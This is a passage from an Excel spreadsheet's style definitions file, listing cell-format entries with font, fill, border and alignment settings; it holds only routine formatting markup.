    <xf numFmtId="0" fontId="10" fillId="17" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="13" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="16" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="16" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="16" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="16" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="16" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="16" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="11" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="11" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="11" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="15" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="33" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="22" xfId="0" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="18" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="19" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="23" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="20" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="22" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="18" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="13" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="33" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="34" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="35" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="0" xfId="0" quotePrefix="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="4" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="0" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="36" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="6" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="37" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="20" borderId="41" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="26" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="29" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="30" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="21" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="22" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="17" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="2" xfId="0" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="20" xfId="0" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="14" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="20" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="32" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="30" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="13" borderId="22" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="19" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="33" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="25" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="26" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="19" borderId="28" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="19" borderId="28" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="19" borderId="27" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="25" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="46" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="47" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="24" borderId="45" xfId="6" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="26" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="25" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="25" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="48" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="49" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="46" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="13" fillId="26" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="40" fillId="25" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="27" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="41" fillId="27" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="23" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="5" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="14" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="6" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="43" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="18" borderId="44" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="22" borderId="24" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
